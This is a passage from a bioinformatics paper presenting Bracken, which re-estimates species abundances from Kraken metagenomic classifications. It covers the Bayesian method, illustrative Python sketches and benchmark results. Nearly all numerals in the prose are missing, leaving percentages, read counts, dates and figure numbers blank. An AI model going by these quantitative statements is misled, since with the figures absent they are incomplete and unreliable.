k is chosen appropriately, then most sequences of length k in the database will be unique to a single species, and many will also be unique to a particular strain or genome. larger values of k will yield a database in which even more of each genome is uniquely covered by k-mers; obviously, though, k should not be longer than the length of a sequencing read, and metagenomics projects currently generate reads as short as – base pairs (bp). longer k-mers are also more likely to contain errors, meaning that more reads will be left unclassified if k is too long. smaller k-mers, in contrast, will yield higher sensitivity because the minimum match length is shorter. when used to identify the taxonomic label of metagenomics sequences, the kraken system for classification of metagenomics sequences is extremely fast and accurate (wood & salzberg, ). when classifying raw sequence reads, though, many reads correspond to identical regions between two or more genomes. (the number of such ambiguous reads decreases as reads get longer.) 
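as a concrete illustration of the kind of k-mer index discussed above, the python sketch below maps every k-mer to the lowest common ancestor of the genomes that contain it. the toy taxonomy, sequences, and dictionary-based storage are assumptions for exposition; the actual kraken database is a far more compact and faster specialized structure.

```python
def kmers(seq, k):
    return (seq[i:i + k] for i in range(len(seq) - k + 1))

def lca(tax_a, tax_b, parent):
    """Lowest common ancestor of two taxonomy IDs, given a child -> parent map."""
    ancestors = set()
    while tax_a is not None:
        ancestors.add(tax_a)
        tax_a = parent.get(tax_a)
    while tax_b not in ancestors:
        tax_b = parent[tax_b]
    return tax_b

def build_kmer_db(genomes, parent, k):
    """Map every k-mer to the LCA of all genomes containing it.
    `genomes` maps taxonomy ID -> sequence; `parent` maps taxid -> parent taxid."""
    db = {}
    for taxid, seq in genomes.items():
        for km in kmers(seq, k):
            db[km] = taxid if km not in db else lca(db[km], taxid, parent)
    return db

# Toy taxonomy: 1 = root, 2 = genus, 3 and 4 = sibling species.
parent = {1: None, 2: 1, 3: 2, 4: 2}
genomes = {3: "ACGTACGTGG", 4: "ACGTACGTCC"}
db = build_kmer_db(genomes, parent, k=5)
# k-mers shared by the two species (e.g. "ACGTA") map to the genus (taxid 2),
# while k-mers unique to one genome keep that genome's species-level taxid.
```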
kraken solves this problem by labeling the sequence with the lowest common ancestor (lca) of all species that share that sequence, as discussed further below. lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ambiguity among microbial species and strains as the database of bacterial genomes has grown, an increasing number of genomes share large portions of their sequence with other genomes. in many cases, these genomes are nearly identical; indeed, sequencing has revealed to scientists that many formerly distinct species and genera are far closer than were known prior to sequencing. many species have been renamed as a result, in a process that is continual and ongoing, but many other species have retained their old names, often for historical or other reasons. for example, the species mycobacterium bovis is over . % identical to mycobacterium tuberculosis (garnier et al., ), and many cases of human tuberculosis are caused by m. bovis (which also infects cows) rather than m. tuberculosis (grange, ). their high sequence identity indicates that they should be considered as two strains of a single species, but they retain different species names. as a compromise, taxonomists have created the category mycobacterium tuberculosis complex (brosch et al., ) to represent a collection of taxa that now includes more than strains of five different species. this category sits above the species level but below the genus level in the current microbial taxonomy, but it can best be described as a species. other examples are numerous and still growing. the three species bacillus anthracis (the causative agent of anthrax), bacillus cereus, and bacillus thuringiensis are well over % identical and should all be designated as a single species (helgason et al., ), although their names have not been changed despite their near-identity revealed by sequencing. as a compromise, taxonomists created the category bacillus cereus group, between the level of species and genus, to include these three species and at least five others (liu et al., ), all of which are extremely similar to one another. in some cases, two organisms that should be called the same species may even have different genus names. for example, escherichia coli and shigella flexneri are classified in different genera, but we know from sequence analysis that they represent the same species (lan & reeves, ). failure to recognize the mutability of the bacterial taxonomy can lead to erroneous conclusions about the performance of metagenomic classifiers. for example, one recent study (peabody et al., ) created a mock community of species, one of which was anabaena variabilis atcc , not realizing that this genome had been renamed and was synonymous with species in the genus nostoc (thiel et al., ). when anabaena was removed from the database, kraken correctly identified the reads as nostoc, but peabody et al. erroneously considered all these reads to be misclassified. classification versus abundance estimation kraken attempts to assign a taxonomy label to every read in a metagenomics sample using a custom-built database that may contain any species the user chooses. among the current set of finished bacterial and archaeal genomes, hundreds of species can be found for which large fractions of their sequence are identical to other genomes belonging to distinct strains, species, or even genera. 
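building on the toy index above, the sketch below classifies a read by scoring root-to-leaf paths with its k-mer hits and, when several paths tie, falling back to their lowest common ancestor, mirroring the tie handling just described. this is a simplification of kraken's actual algorithm, and the candidate set and tie-breaking rule here are our own choices for the example.

```python
def classify_read(read, db, parent, k):
    """Classify a read from its k-mer hits: score each candidate path by the
    hits on the node and its ancestors, return the deepest best-scoring node
    (0 means unclassified). `db`, `parent`, and `lca` are from the previous sketch."""
    hits = {}
    for i in range(len(read) - k + 1):
        taxid = db.get(read[i:i + k])
        if taxid is not None:
            hits[taxid] = hits.get(taxid, 0) + 1
    if not hits:
        return 0

    def path_to_root(t):
        out = []
        while t is not None:
            out.append(t)
            t = parent.get(t)
        return out

    best_score, best_taxa = -1, []
    for taxid in hits:                      # candidate end points of scored paths
        score = sum(hits.get(a, 0) for a in path_to_root(taxid))
        if score > best_score:
            best_score, best_taxa = score, [taxid]
        elif score == best_score:
            best_taxa.append(taxid)

    # Reads from regions shared by sibling genomes produce ties; resolve them
    # by reporting the LCA of the tied candidates.
    result = best_taxa[0]
    for t in best_taxa[1:]:
        result = lca(result, t, parent)
    return result
```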
the reads arising from common regions in these species result in a tie when analyzed with kraken’s classification algorithm, so kraken correctly reports only the lowest common ancestor (lca) (wood & salzberg, ). it follows that for well-populated clades with low genome diversity, kraken only reports species-level lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. assignments for reads from unique regions, and a true indication of total abundance can only be made by taking both species and genus (or higher) level assignments into account. this implies that for some species, the majority of reads might be classified at a higher level of the taxonomy. kraken thus leaves many reads ‘‘stranded’’ above the species level, meaning that the number of reads classified directly to a species may be far lower than the actual number present. therefore, any assumption that kraken’s raw read assignments can be directly translated into species- or strain-level abundance estimates (e.g., schaeffer et al., ) is flawed, as ignoring reads at higher levels of the taxonomy will grossly underestimate some species, and creates the erroneous impression that kraken’s assignments themselves were incorrect. nonetheless, metagenomics analysis often involves estimating the abundance of the species in a particular sample. although we cannot unambiguously assign each read to a species, we would like to estimate how much of each species is present, specifically by estimating the number or percentage of reads in the sample. several software tools have been developed to estimate species abundances in metagenomics samples [metaphlan, constrains, gaas, gasic, taec, grammy] (angly et al., ; lindner & renard, ; luo et al., ; segata et al., ; sohn et al., ; xia et al., ). these tools, however, employ different strategies for read-level classification which are not always as accurate and efficient as kraken’s k-mer approach (lindgreen, adair & gardner, ). rather than re-engineer kraken to address the ambiguous read classification issue and to provide abundance estimates directly, we decided to implement the new species-level abundance estimation method described here as a separate program. this preserves both backwards compatibility for existing kraken users, and offers the ability to generate more accurate species abundance estimates for datasets already processed by kraken. note that if kraken fails to identify a species (e.g., if the species was missing from the kraken database), bracken too will not identify that species. materials and methods our new method, bracken (bayesian reestimation of abundance after classification with kraken), estimates species abundances in metagenomics samples by probabilistically re-distributing reads in the taxonomic tree. reads assigned to nodes above the species level are distributed down to the species nodes, while reads assigned at the strain level are re-distributed upward to their parent species. for example, in fig. we would distribute reads assigned to the mycobacteriaceae family and the mycobacterium genus down to m. marinum and m. avium, and reads assigned to each m. marinum strain would be reassigned to the m. marinum species. as we show below, bracken can easily reestimate abundances at other taxonomic levels (e.g., genus or phylum) using the same algorithm. 
in order to re-assign reads classified at higher-level nodes in the taxonomy, we need to compute a probabilistic estimate of the number of reads that should be distributed to the species below that node. to illustrate using the nodes in fig. , we need to allocate all reads assigned to mycobacterium (g ) to m. marinum (s ) and m. avium (s ) below lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure schematic showing a partial taxonomic tree for the mycobacteriaceae family. it, and reads assigned to the mycobacteriaceae would have to be allocated to m. marinum (s ), m. avium (s ), andhoyosella altamirensis (s ). reallocating reads from a genus-level node in the taxonomy to each genome below it can be accomplished using bayes’ theorem, if the appropriate probabilities can be computed. let p(si) be the probability that a read in the sample belongs to genome si, p(gj) be the probability that a read is classified by kraken at the genus level gj, and p(gj|si) be the probability that a read from genome si is classified by kraken as the parent genus gj. then the probability that a read classified at genus gj belongs to the genome si can be expressed as eq. ( ): p(si|gj)= p(gj|si)p(si) p(gj) . ( ) note that because we began by assuming that a read was classified at node gj, p(gj)= . next we consider how to compute p(gj|si), the probability that a read from genome si will be classified by kraken at the parent genus gj. we estimate this probability for reads of length r by classifying the sequences (genomes) that we used to build the database using that same database, as follows. for each k-mer in the sequences, kraken assigns it a taxonomy id by a fast lookup in its database. to assign a taxonomy id for a read of length r, kraken examines all k-mer classifications in that read. for example, for k = and r = , the read will contain k-mers. our procedure examines, for each genome in the database, a sliding window of length r across the entire genome. to find the taxonomy id kraken would assign to each window, we simply find the deepest taxonomy node in the set of k-mers in that window. since each k-mer in a database lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. sequence is assigned to a taxonomy id somewhere along the path from the genome’s taxonomy id to the root, the highest-weighted root-to-leaf path (and thus the kraken classification) corresponds to the deepest node. for each genome si of length li we thus generate (li−r+ ) mappings to taxonomical ids. for node gj, we then count the number of reads from si that are assigned to it, ngj(si). p(gj|si) is then the proportion of reads from si that were assigned to the genus node gj; i.e., p(gj|si)=ngj(si)/(li−r+ ). we also calculate the proportion of reads from si that were assigned to every node from genome si to the root node of the taxonomy tree. the final term that we must calculate from eq. ( ) is p(si), the probability that a read in the sample belongs to genome si, which is computed in relation to other genomes from the same genus. for example, if the sample contains three genomes in the same genus, and if % of all reads from those three genomes belong to si, then p(si)= . . we estimate this probability using the reads that are uniquely assigned by kraken to genome si, as follows. 
if we let u_si be the proportion of genome s_i that is unique, then

u_si = n_si / (l_i − r + 1)   (2)

where n_si is the number of length-r windows that are uniquely assigned to genome s_i by kraken, and l_i is the genome length. for example, if only a small fraction of the windows in genome s_i are unique to it, then u_si equals that small fraction. then, using the number of reads k_si from a sample that kraken actually assigns to s_i, we can estimate the number of reads that likely derive from s_i as:

k̂_si = k_si / u_si.   (3)

for example, if kraken classifies a given number of reads as genome s_i and only a fraction of s_i is unique, then we would estimate that the number of reads from s_i contained in the sample is the assigned count divided by that fraction. if genus g_j contains n genomes, we estimate the number of reads k̂_s for each of the n genomes and then calculate p(s_i) by:

p(s_i) = k̂_si / Σ_{a=1..n} k̂_sa.   (4)

using this result in eq. (1) above allows us to compute p(s_i | g_j) for each genome s_i. each probability p(s_i | g_j) is then used to estimate the proportion of the reads assigned to genus g_j that belong to each of the genomes below it. these calculations are repeated for each taxonomic level above the genus level (family, class, etc.), with read distribution at each level going to all genomes classified within that taxonomic subtree. to compute species abundance, any genome-level (strain-level) reads are simply added together at the species level. in cases where only one genome from a given species is detected by kraken in the dataset, we simply add the reads distributed downward from the genus level (and above) to the reads already assigned by kraken to the species level. in cases where multiple genomes exist for a given species, the reads distributed to each genome are combined and added to the kraken-assigned species-level reads. the added reads give the final species-level abundance estimates. this method can also estimate abundance for other taxonomic levels. in such cases, only higher nodes within the taxonomy tree undergo read distribution. after distributing reads downward, we estimate abundance for a node at the specified level by combining the distributed reads across all genomes within that node's subtree.

software and data availability
bracken is written in perl and python and is freely available for download at http://ccb.jhu.edu/software/bracken/. the reads from the skin microbiome experiment are freely available from ncbi under bioproject prjna .

results and discussion
we applied the statistical re-assignment method described here to create species-level abundance estimates for several metagenomics data sets. the overall procedure works as follows. first, we compute a set of probabilities from the kraken database by computing, for every sequence of length r in every genome, where it will be assigned in the taxonomy (see 'methods'). for our experiments, we set r equal to the length of the reads in our datasets. bracken can use these probabilities for any metagenomics data set, including data with different read lengths, although the estimates might be slightly improved by re-computing with a read length that matches the experimental data. second, we run kraken on the dataset to produce read-level taxonomic classifications. we then apply our abundance estimator, bracken, which uses the numbers of reads assigned by kraken at every level of the taxonomy to estimate the abundances at a single level (e.g., species).
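to make the estimation procedure of eqs. (1)-(4) concrete, the following is a minimal python sketch of how reads that kraken left at a genus node could be redistributed to the genomes below it. the dictionary-based interface, the function name, and the example counts are our own illustration and are not part of the bracken distribution described above.

def redistribute_genus_reads(genus_reads, species_reads, unique_fraction, p_genus_given_species):
    # genus_reads: reads kraken left at the genus node g
    # species_reads: dict genome s -> reads kraken assigned directly to s
    # unique_fraction: dict genome s -> u_s, proportion of s that is unique (eq. 2)
    # p_genus_given_species: dict genome s -> p(g | s), probability that a read from s
    #   is classified at the genus node, precomputed from the database as in 'methods'
    # eq. (3): estimated number of reads deriving from each genome
    k_hat = {s: species_reads[s] / unique_fraction[s]
             for s in species_reads if unique_fraction.get(s, 0) > 0}
    total_k = sum(k_hat.values())
    # eq. (4): p(s) relative to the other genomes of the same genus
    p_s = {s: k_hat[s] / total_k for s in k_hat} if total_k else {}
    # eq. (1) with p(g) = 1: weight each genome by p(g | s) * p(s); the weights are
    # normalized here so that all genus-level reads are distributed
    weights = {s: p_genus_given_species.get(s, 0.0) * p_s.get(s, 0.0) for s in species_reads}
    z = sum(weights.values())
    estimates = {}
    for s in species_reads:
        share = genus_reads * weights[s] / z if z else 0.0
        estimates[s] = species_reads[s] + share
    return estimates

# hypothetical counts for two genomes of one genus
print(redistribute_genus_reads(
    genus_reads=1000,
    species_reads={"s1": 200, "s2": 50},
    unique_fraction={"s1": 0.4, "s2": 0.1},
    p_genus_given_species={"s1": 0.6, "s2": 0.9}))

the same routine can be applied at higher levels (family, order, etc.) by treating the genomes of the corresponding subtree as the candidates.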
note that to exclude false positives, bracken ignores species with counts below a user-adjustable threshold. in our experiments, we selected a threshold of reads. experiments on a -genome metagenomics data set for our first experiments, we used a data set containing simulated illumina reads from genomes. this data, which we call here the i dataset, was used previously in a comparison of metagenomic assembly algorithms (mende et al., ). the data contains . million paired reads ( . m pairs) from genomes representing species. the reads have error profiles based on quality values found in real illumina reads (mende et al., ). the i dataset includes several very challenging genomes for this task, including multiple strains and species in the genera bacillus and mycobacteria, some of which are nearly identical to one another. the i data are freely available at http://www.bork.embl.de/~mende/simulated_data. the difficulty of estimating species abundance increases as the database itself contains more species. for example, it would clearly be easier to estimate abundances in the i dataset if we used a kraken database containing only the genomes in that dataset. to make the problem more realistic, we built two different databases and estimated abundance using both. the first (‘‘small’’) database contains genomes including the i genomes; lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://ccb.jhu.edu/software/bracken/ http://ccb.jhu.edu/software/bracken/ http://www.ncbi.nlm.nih.gov/bioproject/?term=prjna http://www.bork.embl.de/~mende/simulated_data http://dx.doi.org/ . /peerj-cs. figure estimates of species abundance in the i metagenomics dataset computed by kraken (blue) and bracken (blue + orange). for this result, the kraken database contained genomes that included the i genomes. the smaller graph displays results for the subset of species for which bracken made the largest adjustments. the black line shows the true number of reads from each species. precise numbers for the kraken clas- sification, true read counts, and bracken estimates are contained in table s a. this is the full database from the simulation study by mende et al. ( ). the results when using the small database for classification are shown in fig. . for several species, the initial kraken numbers (reads assigned to a particular species) are far too low, because many of the reads (for some genomes, a large majority) were assigned labels at the genus level or above. after reestimation with bracken, these reads were redistributed to the species level, with the result that almost all the abundance estimates were – % correct, as shown in the figure. the second (‘‘large’’) database contains all genomes used in the synthetic and spike-in experiments, as well as a broad background of bacterial genomes. in particular, it includes all complete bacterial and archaeal genomes from refseq as of july (archived at ftp://ftp.ncbi.nlm.nih.gov/genomes/archive/old_refseq), which total distinct taxa, plus those i genomes that were not present in the refseq data. (we excluded draft genomes because they often contain vector sequences or other contaminants.) we also added the nine genomes used in our skin bacteria spike-in experiment (described below) resulting in a total of distinct taxa. the complete list of sequences in the large database can be found in table s . the resulting kraken database has a size of gb. lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
figure : estimates of species abundance computed by kraken (blue) and bracken (blue + orange) for the i metagenomics data. for this result, the kraken database contained distinct bacterial and archaeal taxa. the black line shows the true number of reads from each species. the smaller graph displays results for the subset of species for which bracken made the largest adjustments. precise numbers for the kraken classification, true read counts, and bracken estimates are contained in table s b.

figure shows results when using the large database to estimate abundance for the i genomes. this test is much more difficult because of the large number of similar and near-identical genomes in the database. many more reads are ambiguous, mapping identically to two or more species, which means that kraken assigns them to the lca of those species. nonetheless, bracken brings the estimated abundance of all species within % of the true abundance, and most fall within %. note that when the re-estimation procedure distributes reads from higher nodes in the taxonomy down to multiple species within a single genus, it may over-estimate one species and under-estimate its sister species if the re-allocation is imperfect. tables s a–s b contain the detailed numbers for all species in figs. and , along with an error rate for each species in the i data, expressed as the difference between the true and estimated proportions. we calculated the average error as:

(1/n) Σ_{i=1..n} | r_true(i) − r_est(i) | / r_true(i)   (5)

where n is the number of species in the i data, r_true(i) is the true number of reads for species i, and r_est(i) is the bracken estimate of the number of reads for species i. when using the small database, the average relative error of bracken is . % across all species in the i data. for the larger database, the average relative error is . %. we also calculated false positive rates for the i data as the percentage of total reads incorrectly classified after bracken abundance estimation. for the small database, the false positive rate is . % and for the large database, the false positive rate is . %.

within the i genomes, the five species belonging to the mycobacterium genus (m. tuberculosis, m. bovis, m. avium, m. marinum, and m. sp. jls) pose a particular challenge for abundance estimation due to the similarities among their individual genomes. for example, kraken classified only , m. tuberculosis reads at the species level, and classified the remaining , reads as either mycobacterium (a genus) or m. tuberculosis complex (a taxonomic class intermediate between genus and species), as shown in fig. and table s .

figure : number of reads within the mycobacterium genus as assigned by kraken (blue), estimated by bracken (purple) and compared to the true read counts (green). initially, kraken assigned only , reads to mycobacterium sp. jls although , reads originated from this species. bracken reassigned , reads from the mycobacterium genus to m. sp. jls, so the re-estimated abundance for m. sp. jls is much closer to the true read count. table s contains precise numbers for all species shown here.
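as a small illustration of the error metric in eq. (5), the following python sketch computes the average relative error from per-species true and estimated read counts, together with one possible reading of the false-positive rate described above (reads assigned to species that are not truly present, as a fraction of all reads). the dictionary inputs are hypothetical and only meant to show the calculation.

def average_relative_error(true_reads, est_reads):
    # eq. (5): mean of |r_true - r_est| / r_true over species present in the truth
    species = [s for s in true_reads if true_reads[s] > 0]
    return sum(abs(true_reads[s] - est_reads.get(s, 0)) / true_reads[s]
               for s in species) / len(species)

def false_positive_fraction(true_reads, est_reads, total_reads):
    # reads attributed to species absent from the truth, as a share of all reads
    fp = sum(c for s, c in est_reads.items() if true_reads.get(s, 0) == 0)
    return fp / total_reads

# hypothetical example: two species, slightly mis-estimated
print(average_relative_error({"a": 1000, "b": 500}, {"a": 950, "b": 600}))  # 0.125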
for these mycobacteria genomes, bracken reallocated the reads from higher-level nodes to yield species abundance estimates within % of the true abundance. figure and table s show the number of reads assigned to each species by kraken, the true number of reads, and the number of reads assigned to each species by bracken after abundance reestimation. the five species of the mycobacterium genus also provide an example of potential overestimation by bracken. bracken apportions all ambiguous reads classified by kraken at the genus level (and above) to the existing species identified by kraken. because bracken uses a probabilistic method in distributing the reads, one species may receive too many reads while another may receive too few. for example, kraken assigned , reads to m. tuberculosis complex. bracken re-allocated , of these reads to m. tuberculosis and the remaining , reads to m. bovis. when added to kraken’s original assignments, bracken estimated that , reads belonged to m. tuberculosis ( , reads more than the true number) that , reads belonged to m. bovis ( , reads less than the true number). it is likely that some of the additional reads bracken allocated to m. tuberculosis originated from m. bovis instead. however, despite the over- and under-estimation, bracken’s estimates fell within % of the true number of reads for both species. if m. bovis were excluded from the database, the , reads unique to m. bovis, as identified by kraken, would be unclassified, while all , reads assigned to the lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. m. tuberculosis complex would assigned to m. tuberculosis by kraken. these reads would no longer be ambiguous because no other mycobacterium species from the m. tuberculosis complex would be present in the database. in general, reads belonging to species excluded from the database will either be assigned to species with very high similarity to the missing species or will remain unclassified. experiments on a real metagenomics sample created from known species for a more realistic evaluation of the performance of bracken, we generated new sequence data using a set of bacteria that are commonly found on healthy human skin. this mock community was assembled by combining purified dna from nine isolates that were identified and sequenced during the initial phase of the human microbiome project (human microbiome project, ): acinetobacter radioresistens strain sk , corynebacterium amycolatum strain sk , micrococcus luteus strain sk , rhodococcus erythropolis strain sk , staphylococcus capitis strain sk , staphylococcus epidermidis strain sk , staphylococcus hominis strain sk , staphylococcus warneri strain sk , and propionibacterium acnes strain sk . to generate the skin microbiome community, purified dna was obtained from the biodefense and emerging infections research resources repository (bei resources). each of the nine bacterial isolates was grown under conditions recommended by bei resources, collected by centrifugation during log growth phase at a nm optical density (od ) of . – . , and genomic dna was isolated using masterpure dna isolation reagents (epicentre). purified genomic dna was quantified using the high sensitivity picogreen assay (invitrogen), pooled in equal amounts by mass, and prepared for sequencing using nextera xt library preparation reagents (illumina). 
the sample was then sequenced on a hiseq sequencer, generating a total of , , million read pairs ( million reads), all of them bp in length. these were then classified as pairs by kraken, which concatenates the two reads from each pair and assigns them to a single taxonomic category. we used bracken to estimate both species and genus-level abundance in the skin microbiome community. in the bracken results, the nine true species comprise over % of the species-level abundance estimates. the mixture was created with approximately equal amounts of each of the nine genomes, so the expectation was that each species would account for∼ % of the total. however, as shown in fig. , the estimates varied from . % to . %. details for the exact number of reads assigned by kraken and the abundance estimates by bracken are shown in table s . deviations from the expected abundance could arise from a variety of factors. the process of quantifying dna and mixing in equal amounts can be influenced by pipetting consistency. second, library amplification by pcr, an integral step in the nextera library preparation process, can exaggerate small differences in quantities and lead to significant biases in abundance (bowers et al., ). we examined a sample of the classified reads by hand, and could find no evidence that kraken mis-classified reads from m. luteus (the smallest portion of the community, estimated at . %) to any of the other species or lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure estimates of species abundance made by bracken for the metagenomics community contain- ing isolates of nine bacterial species commonly found on human skin. precise numbers can be found in table s . genera. the abundances found in this data, therefore, may correspond fairly closely with the true abundances. the genus-level abundance estimates computed by bracken also correspond closely to the expected abundances for the six genera included in the sample. four of the nine species belong to the genus staphylococcus, which was thus expected to comprise % ( × %) of the sample. the bracken estimate was . %. each of the other genus classifications has only one species present, and their abundance estimates are the same for both genus and species. the comparison between the kraken classification of reads and bracken’s reassignment revealed that the nine species are sufficiently distinct to allow kraken to classify a large majority of reads at the species level, with very few reads being classified at higher levels of the taxonomy. specifically, kraken classified . million reads to the nine species included in the sample. only . million reads out of the . million total ( . %) were classified by kraken at the genus level or above. (the remaining reads were unclassified.) in this case bracken does not provide a substantial benefit, because reassignment of the . million reads could yield at most a . % change in the estimated composition of the sample. abundance estimation timing and resource requirements in the i data experiment with the small database, we used gigabytes (gb) of ram with threads to build the kraken database and generate the k-mer distribution file required by bracken. in total, these steps completed in about h and yielded files that can be used across multiple datasets. the resulting kraken database and distribution files use gb of space. kraken classification of the i dataset took min, using threads and gb of ram. 
this step is limited by the size of the database, which is loaded into ram during classification. bracken alone runs in under a second, using mb of ram. the kraken classification file for the i data is . gb, while bracken abundance estimation lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. files require∼ kb of space. table s lists detailed timing, ram, and space requirements for each file and step of the bracken abundance estimation algorithm. conclusion estimating the abundance of species, genera, phyla, or other taxonomic groups is a central step in the analysis of many metagenomics datasets. metagenomics classifiers like kraken provide a very fast and accurate way to label individual reads, and at higher taxonomic levels such as phyla, these assignments can be directly translated to abundance estimates. however, many reads cannot be unambiguously assigned to a single strain or species, for at least two reasons. first, many bacterial species are nearly identical, meaning that a read can match identically to two or more distinct species. second, the bacterial taxonomy itself is undergoing constant revisions and updates, as genome sequencing reveals the need to re-assign species to new names. these revisions sometimes create new taxa that share near-identical sequence with a distinct species. in these situations, kraken correctly assigns the read to a higher-level taxonomic category such as genus or family. this creates a problem in that kraken’s classifications cannot be used directly for species abundance estimation. bracken addresses this problem by probabilistically re-assigning reads from intermediate taxonomic nodes to the species level or above. as we have shown here, these re-assignments produce species-level abundance estimates that are very accurate, typically % correct or higher. for genus-level abundance, accuracy is even higher because fewer reads have ambiguous assignments at that level. for abundance estimation at higher levels, ranging from family up to phylum, kraken’s original read assignments can be used directly to create abundance estimates. acknowledgements we would like to thank derrick wood for valuable suggestions on the implementation of the algorithm, and kasper hansen for helpful comments and feedback on a draft version of this manuscript. additional information and declarations funding this work was supported in part by the us national institutes of health r -hg and r -gm and by the us army research office w nf- . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: us national institutes of health: r -hg , r -gm . us army research office: w nf- . lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. competing interests steven l. salzberg is currently serving as an academic editor for peerj. author contributions • jennifer lu and florian p. breitwieser conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • peter thielen performed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • steven l. 
salzberg conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: bracken is written in perl and python and is freely available for download at http://ccb.jhu.edu/software/bracken/. the reads from the skin microbiome experiment are freely available from ncbi under bioproject prjna . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references angly fe, willner d, prieto-davo a, edwards ra, schmieder r, vega-thurber r, antonopoulos da, barott k, cottrell mt, desnues c, dinsdale ea, furlan m, haynes m, henn mr, hu y, kirchman dl, mcdole t, mcpherson jd, meyer f, miller rm, mundt e, naviaux r, rodriguez b, stevens rk, wegley l, zhang l, zhu b, rohwer f. . the gaas metagenomic tool and its estimations of viral and microbial average genome size in four major biomes. plos computational biology :e doi . /journal.pcbi. . benson da, clark k, karsch-mizrachi i, lipman dj, ostell j, sayers ew. . genbank. nucleic acids research :d –d doi . /nar/gku . bowers rm, clum a, tice h, lim j, singh k, ciobanu d, ngan cy, cheng jf, tringe sg, woyke t. . impact of library preparation protocols and template quantity on the metagenomic reconstruction of a mock microbial community. bmc ge- nomics : doi . /s - - - . brosch r, gordon sv, marmiesse m, brodin p, buchrieser c, eiglmeier k, garnier t, gutierrez c, hewinson g, kremer k, parsons lm, pym as, samper s, van soolingen d, cole st. . a new evolutionary scenario for the mycobacterium tuberculosis complex. proceedings of the national academy of sciences of the united states of america : – doi . /pnas. . lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://ccb.jhu.edu/software/bracken/ http://www.ncbi.nlm.nih.gov/bioproject/?term=prjna http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /peerj-cs. garnier t, eiglmeier k, camus jc, medina n, mansoor h, pryor m, duthoy s, grondin s, lacroix c, monsempe c, simon s, harris b, atkin r, doggett j, mayes r, keating l, wheeler pr, parkhill j, barrell bg, cole st, gordon sv, hewinson rg. . the complete genome sequence of mycobacterium bovis. proceedings of the national academy of sciences of the united states of america : – doi . /pnas. . grange jm. . mycobacterium bovis infection in human beings. tuberculosis : – doi . /tube. . . helgason e, okstad oa, caugant da, johansen ha, fouet a, mock m, hegna i, kolsto ab. . bacillus anthracis, bacillus cereus, and bacillus thuringiensis–one species on the basis of genetic evidence. applied and environmental microbiology : – doi . /aem. . . - . . human microbiome project c. . structure, function and diversity of the healthy human microbiome. nature : – doi . /nature . lan r, reeves pr. . escherichia coli in disguise: molecular origins of shigella. microbes and infection : – doi . /s - ( ) - . lindgreen s, adair kl, gardner pp. . an evaluation of the accuracy and speed of metagenome analysis tools. scientific reports :article doi . /srep . lindner ms, renard by. . metagenomic abundance estimation and diagnostic testing on species level. nucleic acids research :e doi . /nar/gks . 
liu y, lai q, göker m, meier-kolthoff jp, wang m, sun y, wang l, shao z. . genomic insights into the taxonomic status of the bacillus cereus group. scientific reports :article doi . /srep . luo c, knight r, siljander h, knip m, xavier rj, gevers d. . constrains identifies microbial strains in metagenomic datasets. nature biotechnology : – doi . /nbt. . mende dr, waller as, sunagawa s, jarvelin ai, chan mm, arumugam m, raes j, bork p. . assessment of metagenomic assembly using simulated next generation sequencing data. plos one :e doi . /journal.pone. . morgulis a, coulouris g, raytselis y, madden tl, agarwala r, schaffer aa. . database indexing for production megablast searches. bioinformatics : – doi . /bioinformatics/btn . peabody ma, van rossum t, lo r, brinkman fs. . evaluation of shotgun metagenomics sequence classification methods using in silico and in vitro simulated communities. bmc bioinformatics : doi . /s - - - . riesenfeld cs, schloss pd, handelsman j. . metagenomics: genomic analysis of microbial communities. annual review of genetics : – doi . /annurev.genet. . . . schaeffer l, pimentel h, bray n, melsted p, pachter l. . pseudoalignment for metagenomic read assignment. arxiv preprint. arxiv: . v . segata n, waldron l, ballarini a, narasimhan v, jousson o, huttenhower c. . metagenomic microbial community profiling using unique clade-specific marker genes. nature methods : – doi . /nmeth. . lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /tube. . http://dx.doi.org/ . /aem. . . - . http://dx.doi.org/ . /nature http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /srep http://dx.doi.org/ . /nar/gks http://dx.doi.org/ . /srep http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /bioinformatics/btn http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /annurev.genet. . . http://arxiv.org/abs/ . v http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /peerj-cs. sohn m, an l, pookhao n, li q. . accurate genome relative abundance estimation for closely related species in a 